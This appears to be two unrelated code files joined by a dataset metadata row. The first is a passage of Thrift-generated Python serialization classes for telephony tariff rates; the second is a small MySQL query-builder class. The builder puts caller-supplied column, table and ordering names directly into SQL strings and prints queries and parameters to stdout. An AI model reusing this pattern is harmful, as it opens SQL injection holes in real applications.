elif fid == 6:
if ftype == TType.I32:
self.interval_1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.I32:
self.interval_n = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.BOOL:
self.forbidden = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.BOOL:
self.grace_period_enable = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.DOUBLE:
self.local_price_1 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.DOUBLE:
self.local_price_n = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.I32:
self.local_interval_1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 13:
if ftype == TType.I32:
self.local_interval_n = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 14:
if ftype == TType.STRUCT:
self.area_name = NullString()
self.area_name.read(iprot)
else:
iprot.skip(ftype)
elif fid == 15:
if ftype == TType.STRUCT:
self.activation_date = UnixTime()
self.activation_date.read(iprot)
else:
iprot.skip(ftype)
elif fid == 16:
if ftype == TType.STRUCT:
self.expiration_date = UnixTime()
self.expiration_date.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TariffRate')
if self.i_rate is not None:
oprot.writeFieldBegin('i_rate', TType.I64, 1)
oprot.writeI64(self.i_rate)
oprot.writeFieldEnd()
if self.prefix is not None:
oprot.writeFieldBegin('prefix', TType.STRING, 2)
oprot.writeString(self.prefix.encode('utf-8') if sys.version_info[0] == 2 else self.prefix)
oprot.writeFieldEnd()
if self.i_tariff is not None:
oprot.writeFieldBegin('i_tariff', TType.I64, 3)
oprot.writeI64(self.i_tariff)
oprot.writeFieldEnd()
if self.price_1 is not None:
oprot.writeFieldBegin('price_1', TType.DOUBLE, 4)
oprot.writeDouble(self.price_1)
oprot.writeFieldEnd()
if self.price_n is not None:
oprot.writeFieldBegin('price_n', TType.DOUBLE, 5)
oprot.writeDouble(self.price_n)
oprot.writeFieldEnd()
if self.interval_1 is not None:
oprot.writeFieldBegin('interval_1', TType.I32, 6)
oprot.writeI32(self.interval_1)
oprot.writeFieldEnd()
if self.interval_n is not None:
oprot.writeFieldBegin('interval_n', TType.I32, 7)
oprot.writeI32(self.interval_n)
oprot.writeFieldEnd()
if self.forbidden is not None:
oprot.writeFieldBegin('forbidden', TType.BOOL, 8)
oprot.writeBool(self.forbidden)
oprot.writeFieldEnd()
if self.grace_period_enable is not None:
oprot.writeFieldBegin('grace_period_enable', TType.BOOL, 9)
oprot.writeBool(self.grace_period_enable)
oprot.writeFieldEnd()
if self.local_price_1 is not None:
oprot.writeFieldBegin('local_price_1', TType.DOUBLE, 10)
oprot.writeDouble(self.local_price_1)
oprot.writeFieldEnd()
if self.local_price_n is not None:
oprot.writeFieldBegin('local_price_n', TType.DOUBLE, 11)
oprot.writeDouble(self.local_price_n)
oprot.writeFieldEnd()
if self.local_interval_1 is not None:
oprot.writeFieldBegin('local_interval_1', TType.I32, 12)
oprot.writeI32(self.local_interval_1)
oprot.writeFieldEnd()
if self.local_interval_n is not None:
oprot.writeFieldBegin('local_interval_n', TType.I32, 13)
oprot.writeI32(self.local_interval_n)
oprot.writeFieldEnd()
if self.area_name is not None:
oprot.writeFieldBegin('area_name', TType.STRUCT, 14)
self.area_name.write(oprot)
oprot.writeFieldEnd()
if self.activation_date is not None:
oprot.writeFieldBegin('activation_date', TType.STRUCT, 15)
self.activation_date.write(oprot)
oprot.writeFieldEnd()
if self.expiration_date is not None:
oprot.writeFieldBegin('expiration_date', TType.STRUCT, 16)
self.expiration_date.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
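# --- Illustrative helper (hand-written, not generator output): round-trips a
# TariffRate through an in-memory transport using the generated read()/write()
# methods above. Assumes the standard Thrift Python runtime is installed; the
# field values are made up for demonstration. Never called by this module.
def _example_tariff_rate_roundtrip():
    from thrift.transport import TTransport
    from thrift.protocol import TBinaryProtocol
    out = TTransport.TMemoryBuffer()
    rate = TariffRate(i_rate=1, prefix='1468', price_1=0.05, interval_1=60)
    rate.write(TBinaryProtocol.TBinaryProtocol(out))
    data = out.getvalue()  # serialized wire bytes
    parsed = TariffRate()
    parsed.read(TBinaryProtocol.TBinaryProtocol(TTransport.TMemoryBuffer(data)))
    assert parsed == rate  # __eq__ compares __dict__, so the round trip is lossless
    return data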
class TariffRateList(object):
"""
Attributes:
- arr
"""
thrift_spec = (
None, # 0
(1, TType.LIST, 'arr', (TType.STRUCT, (TariffRate, TariffRate.thrift_spec), False), None, ), # 1
)
def __init__(self, arr=None,):
self.arr = arr
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.arr = []
(_etype10, _size7) = iprot.readListBegin()
for _i11 in range(_size7):
_elem12 = TariffRate()
_elem12.read(iprot)
self.arr.append(_elem12)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TariffRateList')
if self.arr is not None:
oprot.writeFieldBegin('arr', TType.LIST, 1)
oprot.writeListBegin(TType.STRUCT, len(self.arr))
for iter13 in self.arr:
iter13.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class LocalTariffRate(object):
"""
Attributes:
- activation_date
- expiration_date
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'activation_date', (UnixTime, UnixTime.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'expiration_date', (UnixTime, UnixTime.thrift_spec), None, ), # 2
)
def __init__(self, activation_date=None, expiration_date=None,):
self.activation_date = activation_date
self.expiration_date = expiration_date
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.activation_date = UnixTime()
self.activation_date.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.expiration_date = UnixTime()
self.expiration_date.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('LocalTariffRate')
if self.activation_date is not None:
oprot.writeFieldBegin('activation_date', TType.STRUCT, 1)
self.activation_date.write(oprot)
oprot.writeFieldEnd()
if self.expiration_date is not None:
oprot.writeFieldBegin('expiration_date', TType.STRUCT, 2)
self.expiration_date.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class LocalTariffRateList(object):
"""
Attributes:
- arr
"""
thrift_spec = (
None, # 0
(1, TType.LIST, 'arr', (TType.STRUCT, (LocalTariffRate, LocalTariffRate.thrift_spec), False), None, ), # 1
)
def __init__(self, arr=None,):
self.arr = arr
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.arr = []
(_etype17, _size14) = iprot.readListBegin()
for _i18 in range(_size14):
_elem19 = LocalTariffRate()
_elem19.read(iprot)
self.arr.append(_elem19)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('LocalTariffRateList')
if self.arr is not None:
oprot.writeFieldBegin('arr', TType.LIST, 1)
oprot.writeListBegin(TType.STRUCT, len(self.arr))
for iter20 in self.arr:
iter20.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class LookupbparamResultEntry(object):
"""
Attributes:
- free_seconds
- connect_fee
- price_1
- price_n
- interval_1
- interval_n
- post_call_surcharge
- grace_period
- forbidden
- average_duration
- loss_protection
- max_loss
- prefix
- plan_only
- area_name
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'free_seconds', None, None, ), # 1
(2, TType.DOUBLE, 'connect_fee', None, None, ), # 2
(3, TType.DOUBLE, 'price_1', None, None, ), # 3
(4, TType.DOUBLE, 'price_n', None, None, ), # 4
(5, TType.I32, 'interval_1', None, None, ), # 5
(6, TType.I32, 'interval_n', None, None, ), # 6
(7, TType.DOUBLE, 'post_call_surcharge', None, None, ), # 7
(8, TType.I32, 'grace_period', None, None, ), # 8
(9, TType.BOOL, 'forbidden', None, None, ), # 9
(10, TType.I32, 'average_duration', None, None, ), # 10
(11, TType.BOOL, 'loss_protection', None, None, ), # 11
(12, TType.DOUBLE, 'max_loss', None, None, ), # 12
(13, TType.STRING, 'prefix', 'UTF8', None, ), # 13
(14, TType.BOOL, 'plan_only', None, None, ), # 14
(15, TType.STRUCT, 'area_name', (NullString, NullString.thrift_spec), None, ), # 15
)
def __init__(self, free_seconds=None, connect_fee=None, price_1=None, price_n=None, interval_1=None, interval_n=None, post_call_surcharge=None, grace_period=None, forbidden=None, average_duration=None, loss_protection=None, max_loss=None, prefix=None, plan_only=None, area_name=None,):
self.free_seconds = free_seconds
self.connect_fee = connect_fee
self.price_1 = price_1
self.price_n = price_n
self.interval_1 = interval_1
self.interval_n = interval_n
self.post_call_surcharge = post_call_surcharge
self.grace_period = grace_period
self.forbidden = forbidden
self.average_duration = average_duration
self.loss_protection = loss_protection
self.max_loss = max_loss
self.prefix = prefix
self.plan_only = plan_only
self.area_name = area_name
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.free_seconds = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.DOUBLE:
self.connect_fee = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.DOUBLE:
self.price_1 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.DOUBLE:
self.price_n = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I32:
self.interval_1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I32:
self.interval_n = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.DOUBLE:
self.post_call_surcharge = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.I32:
self.grace_period = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.BOOL:
self.forbidden = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.I32:
self.average_duration = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.BOOL:
self.loss_protection = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.DOUBLE:
self.max_loss = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 13:
if ftype == TType.STRING:
self.prefix = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 14:
if ftype == TType.BOOL:
self.plan_only = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 15:
if ftype == TType.STRUCT:
self.area_name = NullString()
self.area_name.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('LookupbparamResultEntry')
if self.free_seconds is not None:
oprot.writeFieldBegin('free_seconds', TType.I32, 1)
oprot.writeI32(self.free_seconds)
oprot.writeFieldEnd()
if self.connect_fee is not None:
oprot.writeFieldBegin('connect_fee', TType.DOUBLE, 2)
oprot.writeDouble(self.connect_fee)
oprot.writeFieldEnd()
if self.price_1 is not None:
oprot.writeFieldBegin('price_1', TType.DOUBLE, 3)
oprot.writeDouble(self.price_1)
oprot.writeFieldEnd()
if self.price_n is not None:
oprot.writeFieldBegin('price_n', TType.DOUBLE, 4)
oprot.writeDouble(self.price_n)
oprot.writeFieldEnd()
if self.interval_1 is not None:
oprot.writeFieldBegin('interval_1', TType.I32, 5)
oprot.writeI32(self.interval_1)
oprot.writeFieldEnd()
if self.interval_n is not None:
oprot.writeFieldBegin('interval_n', TType.I32, 6)
oprot.writeI32(self.interval_n)
oprot.writeFieldEnd()
if self.post_call_surcharge is not None:
oprot.writeFieldBegin('post_call_surcharge', TType.DOUBLE, 7)
oprot.writeDouble(self.post_call_surcharge)
oprot.writeFieldEnd()
if self.grace_period is not None:
oprot.writeFieldBegin('grace_period', TType.I32, 8)
oprot.writeI32(self.grace_period)
oprot.writeFieldEnd()
if self.forbidden is not None:
oprot.writeFieldBegin('forbidden', TType.BOOL, 9)
oprot.writeBool(self.forbidden)
oprot.writeFieldEnd()
if self.average_duration is not None:
oprot.writeFieldBegin('average_duration', TType.I32, 10)
oprot.writeI32(self.average_duration)
oprot.writeFieldEnd()
if self.loss_protection is not None:
oprot.writeFieldBegin('loss_protection', TType.BOOL, 11)
oprot.writeBool(self.loss_protection)
oprot.writeFieldEnd()
if self.max_loss is not None:
oprot.writeFieldBegin('max_loss', TType.DOUBLE, 12)
oprot.writeDouble(self.max_loss)
oprot.writeFieldEnd()
if self.prefix is not None:
oprot.writeFieldBegin('prefix', TType.STRING, 13)
oprot.writeString(self.prefix.encode('utf-8') if sys.version_info[0] == 2 else self.prefix)
oprot.writeFieldEnd()
if self.plan_only is not None:
oprot.writeFieldBegin('plan_only', TType.BOOL, 14)
oprot.writeBool(self.plan_only)
oprot.writeFieldEnd()
if self.area_name is not None:
oprot.writeFieldBegin('area_name', TType.STRUCT, 15)
self.area_name.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class LookupbparamResult(object):
"""
Attributes:
- bparams
- decimal_precision
- cost_round_up
"""
thrift_spec = (
None, # 0
(1, TType.LIST, 'bparams', (TType.STRUCT, (LookupbparamResultEntry, LookupbparamResultEntry.thrift_spec), False), None, ), # 1
(2, TType.I32, 'decimal_precision', None, None, ), # 2
(3, TType.BOOL, 'cost_round_up', None, None, ), # 3
)
def __init__(self, bparams=None, decimal_precision=None, cost_round_up=None,):
self.bparams = bparams
self.decimal_precision = decimal_precision
self.cost_round_up = cost_round_up
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.bparams = []
(_etype24, _size21) = iprot.readListBegin()
for _i25 in range(_size21):
_elem26 = LookupbparamResultEntry()
_elem26.read(iprot)
self.bparams.append(_elem26)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.decimal_precision = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.BOOL:
self.cost_round_up = iprot.readBool()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('LookupbparamResult')
if self.bparams is not None:
oprot.writeFieldBegin('bparams', TType.LIST, 1)
oprot.writeListBegin(TType.STRUCT, len(self.bparams))
for iter27 in self.bparams:
iter27.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.decimal_precision is not None:
oprot.writeFieldBegin('decimal_precision', TType.I32, 2)
oprot.writeI32(self.decimal_precision)
oprot.writeFieldEnd()
if self.cost_round_up is not None:
oprot.writeFieldBegin('cost_round_up', TType.BOOL, 3)
oprot.writeBool(self.cost_round_up)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| 1.273438 | 1 |
pysql.py | morfat/PySQL | 0 | 30980 | <filename>pysql.py
import MySQLdb
from urllib import parse
class PySQL:
"""
For making Mariadb / Mysql db queries
"""
FILTER_COMMANDS = {
"$eq":" = %s ",
"$in":" IN (%s) ",
"$nin":" NOT IN (%s) ",
"$neq":" != %s ",
"$lt":" < %s ",
"$lte":" <= %s ",
"$gt":" > %s ",
"$gte":" >= %s ",
"$contains":" LIKE %s ",#like %var%
"$ncontains":" NOT LIKE %s ",#
"$null":" IS NULL ", #if 1 else "IS NOT NULL" if 0
"$sw":" LIKE %s ",#starts with . like %var
"$ew":" LIKE %s "# endswith like var%
}
def __init__(self,user,password,db,host,port):
self._mysqldb_connection = MySQLdb.connect(user=user,passwd=password,db=db,host=host,port=port)
def commit(self):
return self._mysqldb_connection.commit()
def rollback(self):
return self._mysqldb_connection.rollback()
def close(self):
return self._mysqldb_connection.close()
def execute(self,sql,params=None,many=None,dict_cursor=True):
        #runs the db query; can also be used to run raw queries directly
""" by default returns cursor object """
if dict_cursor:
self.cursor = self._mysqldb_connection.cursor(MySQLdb.cursors.DictCursor)
else:
self.cursor = self._mysqldb_connection.cursor()
if many:
self.cursor.executemany(sql,params)
else:
self.cursor.execute(sql,params)
return self.cursor
    #PySQL-specific methods begin from here
def __getattr__(self,item):
self.table_name = item
self.columns = ['*'] #columns selected for display of records
self.query_params = [] #for db filtering . parameters entered.
self.sql = ''
self.where_sql = ''
self.join_sql = ''
self.order_by_sql = ''
self.group_by_sql = ''
self.limit_sql = ''
self.cursor = None
return self
def __make_table_column(self,column,table_name=None):
"""Example
Input: => Output:
users.id => users.id
name => users.name
"""
if '.' in column:
return column
return "{}.{}".format(table_name,column) if table_name else "{}.{}".format(self.table_name,column)
def get_columns(self):
return ','.join([self.__make_table_column(c) for c in self.columns])
def fields(self,columns):
#sets columns to select
""" Example: ['id','name']
"""
self.columns = columns
return self
def fetch(self,limit=None):
if not self.cursor:
self.__make_select_sql(limit=limit)
print (self.sql)
print (self.query_params)
self.cursor = self.execute(self.sql,self.query_params)
results = self.cursor.fetchall()
self.cursor.close()
return results
def fetch_one(self):
if not self.cursor:
self.__make_select_sql(limit=None)
self.cursor = self.execute(self.sql,self.query_params)
result = self.cursor.fetchone()
self.cursor.close()
return result
def __set_where(self,where_sql):
if self.where_sql:
#check if where starts with AND or OR
where_sql = where_sql.strip()
if where_sql.startswith('OR') or where_sql.startswith("AND"):
self.where_sql = self.where_sql + " " + where_sql
else:
self.where_sql = self.where_sql + " AND " + where_sql
else:
self.where_sql = " WHERE {} ".format(where_sql)
def __make_sql(self,sql):
if sql:
self.sql = self.sql + sql
def __make_select_sql(self,limit):
self.sql = "SELECT {} FROM {} ".format(self.get_columns(),self.table_name)
self.__make_sql(self.join_sql)
self.__make_sql(self.where_sql)
self.__make_sql(self.group_by_sql)
self.__make_sql(self.order_by_sql)
self.__limit(limit)
def __make_filter(self,k,v):
#check if val is dict
col = k
filter_v = None #the filter value e.g name like '%mosoti%'
param = v
print ("Param: ",param, "column:",col)
if isinstance(param,dict):
filter_v , param = [(k,v) for k,v in param.items()][0]
else:
filter_v = "$eq"
if filter_v == "$null":
if v.get(filter_v) is False:
filter_v = " IS NOT NULL "
else:
filter_v = " IS NULL "
param = None
elif filter_v == "$in":
filter_v = " IN ({}) ".format(','.join(['%s' for i in param]))
elif filter_v == "$nin":
filter_v = " NOT IN ({}) ".format(','.join(['%s' for i in param]))
else:
if filter_v == '$contains' or filter_v == "$ncontains":
param = '%{}%'.format(str(param))
elif filter_v == "$sw":
param = '{}%'.format(str(param))
elif filter_v == "$ew":
param = '%{}'.format(str(param))
filter_v = self.FILTER_COMMANDS.get(filter_v)
return (param,filter_v,)
def __make_or_query_filter(self,data_list):
qs_l =[]
for d in data_list:
for ok,ov in d.items():
param,filter_v = self.__make_filter(ok,ov)
self.__build_query_params(param)
q = self.__make_table_column(ok) + filter_v
qs_l.append(q)
query = ' OR '.join(qs_l)
return query
    def __build_query_params(self,param):
        #appends params to existing ones; compare against None so falsy
        #values such as 0 or '' still get bound as placeholders
        if param is not None:
            if isinstance(param,list):
                for p in param:
                    self.query_params.append(p)
            else:
                self.query_params.append(param)
def __filter_query(self,filter_data):
#make filters
filter_q_l = []
for k,v in filter_data.items():
if k == '$or':
#make for or
qs_l =self.__make_or_query_filter(filter_data.get('$or'))
query = " OR " + qs_l
filter_q_l.append(query)
elif k == '$xor':
#make for or
qs_l = self.__make_or_query_filter(filter_data.get('$xor'))
query = " AND ( " + qs_l + " )"
filter_q_l.append(query)
else:
param,filter_v = self.__make_filter(k,v)
self.__build_query_params(param)
q = self.__make_table_column(k) + filter_v
if len(filter_q_l) == 0:
q = q
else:
q = " AND " + q
filter_q_l.append(q)
return filter_q_l
def filter(self,filter_data):
"""
Filters Requests
#example full including or
{ "name":{"$contains":"mosoti"},
"age":{"$lte":30},
"msisdn":"2541234567",
"$or":[{ "name":{"$contains":"mogaka"}},
{"age":31}
], #this evaluates to => .. OR name like '%mogaka%' OR age=31
"$xor":[{ "name":{"$contains":"mogaka"}},
{"age":31}
             ] # this evaluates to =>... AND ( name like '%mogaka%' OR age=31 )
}
"""
#reset vals /parameters so that we begin here
if filter_data:
filter_q_l = self.__filter_query(filter_data)
filters_qls = ''.join(filter_q_l).strip()
if filters_qls.startswith("AND"):
filters_qls = filters_qls[3:]
elif filters_qls.startswith("OR"):
filters_qls = filters_qls[2:]
self.__set_where(filters_qls)
return self
def fetch_paginated(self,paginator_obj):
#receives paginator object
order_by = paginator_obj.get_order_by()
filter_data = paginator_obj.get_filter_data()
page_size = paginator_obj.page_size
self.filter(filter_data)
self.order_by(order_by)
results = self.fetch(limit = page_size)
pagination_data = paginator_obj.get_pagination_data(results)
return {"results":results,"pagination":pagination_data}
def __limit(self,limit):
if limit:
self.__build_query_params(limit)
self.__make_sql(' LIMIT %s ')
def __get_order_by_text(self,val):
""" Receives string e.g -id or name """
if val.startswith('-'):
return "{} DESC".format(self.__make_table_column(val[1:]))
else:
return "{} ASC".format(self.__make_table_column(val))
def order_by(self,order_by_fields):
"""Expects list of fields e.g ['-id','name'] where - is DESC"""
order_by_sql = ','.join([self.__get_order_by_text(v) for v in order_by_fields])
if self.order_by_sql:
self.order_by_sql = self.order_by_sql + ' , ' + order_by_sql
else:
self.order_by_sql = " ORDER BY " + order_by_sql
return self
def group_by(self,group_by_fields):
""" Expects fields in list ['id','name'] ... """
group_by_sql = ','.join([self.__make_table_column(v) for v in group_by_fields])
if self.group_by_sql:
self.group_by_sql = self.group_by_sql + group_by_sql
else:
self.group_by_sql = " GROUP BY " + group_by_sql
return self
def __make_join(self,join_type,table_name,condition_data,related_fields):
""" makes join sql based on type of join and tables """
on_sql = []
for k,v in condition_data.items():
on_sql.append("{} = {} ".format(self.__make_table_column(k),self.__make_table_column(v,table_name)))
on_sql_str = ' ON {} ' .format(' AND '.join(on_sql))
join_type_sql = '{} {} '.format(join_type,table_name)
self.join_sql = self.join_sql + join_type_sql + on_sql_str
#append the columns to select based on related fields
if related_fields:
self.columns.extend([self.__make_table_column(c,table_name) for c in related_fields])
def inner_join(self,table_name,condition,related_fields=None):
""" e.g Orders,{"id":"customer_id"}, ['quantity']
This will result to :
.... Orders.quantity, .... INNER JOIN Orders ON Customers.id = Orders.customer_id
"""
self.__make_join('INNER JOIN',table_name,condition,related_fields)
return self
def right_join(self,table_name,condition,related_fields=None):
""" e.g Orders,{"id":"customer_id"}, ['quantity']
This will result to :
.... Orders.quantity, .... RIGHT JOIN Orders ON Customers.id = Orders.customer_id
"""
self.__make_join('RIGHT JOIN',table_name,condition,related_fields)
return self
def left_join(self,table_name,condition,related_fields=None):
""" e.g Orders,{"id":"customer_id"}, ['quantity']
This will result to :
.... Orders.quantity, .... LEFT JOIN Orders ON Customers.id = Orders.customer_id
"""
self.__make_join('LEFT JOIN',table_name,condition,related_fields)
return self
def update(self,new_data,limit=None):
""" set this new data as new details
Returns cursor object
"""
col_set = ','.join([" {} = %s ".format(k) for k,v in new_data.items()])
filter_params = self.query_params
self.query_params = []
update_params = [v for k,v in new_data.items()]
update_params.extend(filter_params) #we start with update thn filter
self.__build_query_params(update_params)
self.sql = "UPDATE {} SET {} ".format(self.table_name,col_set)
self.__make_sql(self.where_sql)
self.__limit(limit)
print(self.query_params)
print (self.sql)
return self.execute(self.sql,self.query_params)
def delete(self,limit=None):
""" Delete with given limit """
self.sql = "DELETE FROM {} ".format(self.table_name)
self.__make_sql(self.where_sql)
self.__limit(limit)
print (self.sql)
return self.execute(self.sql,self.query_params)
def insert(self,data):
"""
        Creates a record in the db table. Expects a dict of key and value pairs.
"""
columns = []
params = []
for k,v in data.items():
columns.append(k)
params.append(v)
column_placeholders = ','.join(["%s" for v in columns])
columns = ','.join([v for v in columns])
self.query_params = params
self.sql = "INSERT INTO {}({}) VALUES({})".format(self.table_name,columns,column_placeholders)
print (self.sql)
print (self.query_params)
return self.execute(self.sql,self.query_params).lastrowid
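# --- Illustrative sketch of how the chained builder above is meant to be used.
# The connection settings and the Customers table are assumptions made for the
# example; __getattr__ resolves any table name lazily. Never called here.
def _example_pysql_usage():
    db = PySQL(user='app', password='<PASSWORD>', db='shop', host='127.0.0.1', port=3306)
    # builds: SELECT Customers.id,Customers.name FROM Customers WHERE ... LIMIT %s
    rows = (db.Customers
              .fields(['id', 'name'])
              .filter({'name': {'$contains': 'mosoti'}, 'age': {'$gte': 18}})
              .order_by(['-id'])
              .fetch(limit=10))
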